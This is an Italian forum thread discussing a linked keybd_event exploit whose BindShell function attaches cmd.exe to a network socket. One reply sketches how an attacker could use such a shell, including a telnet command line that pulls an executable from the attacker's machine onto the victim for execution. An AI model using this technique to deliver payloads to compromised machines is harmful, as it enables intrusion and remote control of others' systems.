guardate qua (http://www.frsirt.com/exploits/20050906.keybd.c.php) ... :eek:

non è tanto l'exploit della keybd_event la cosa che mi stupisce (capirai, è assai banale, nella maggior parte dei desktop è pure inutile se ho capito come funziona...), ma quello che viene eseguito nella funzione BindShell!! :eek:

viene creato un processo cmd.exe i cui handle stdin e stdout vengono settati direttamente a s2, che è un socket descriptor!!! :eek:

ma si può fare? :mbe:

cioè, Winsock2 è fatto apposta per fornire shell remote agli hackers che installano trojans o sbaglio...? :mbe:

se è così mi cade giusto a fagiuuoolo :D :asd:

Si infatti cosa molto banale ma estremamente pericolosa, per esempio tanto per pensare un pò da hacker ;) qundo si ha a disposizione una cosa del genere ti e sufficente fare un programmino che ti apre un socket in listent e appena arriva una connessione ti ci invia un file per poi eseguire sulla macchina remota una stringa del genere:

telnet miamacchina miaporta >file.exe


per poter inviare un file exe che mi faccia un mondo di cose su quella macchina....

a logicamente per eseguirlo hai a disposizione la scell

Cavolo che fico!!!

...i cui handle stdin e stdout vengono settati direttamente a s2, che è un socket descriptor!!! :eek:

ma si può fare? :mbe:

Anche i sistemi unix consentono di farlo, e ti assicuro per esperienza che può essere mooolto comodo. Non è di per se un bug (se un bug c'è, è da un'altra parte).

Anche i sistemi unix consentono di farlo, e ti assicuro per esperienza che può essere mooolto comodo. Non è di per se un bug (se un bug c'è, è da un'altra parte). lo so che non è un bug, e anche se non si potesse fare si farebbe comunque in altra maniera (ad es. su Windows con una pipe); solo che fatto proprio così come dire mi sembrava un po' troppo esplicito, ecco :D
e poi lo so che può tornare mooolto comodo, ehehehe lo so eccome :D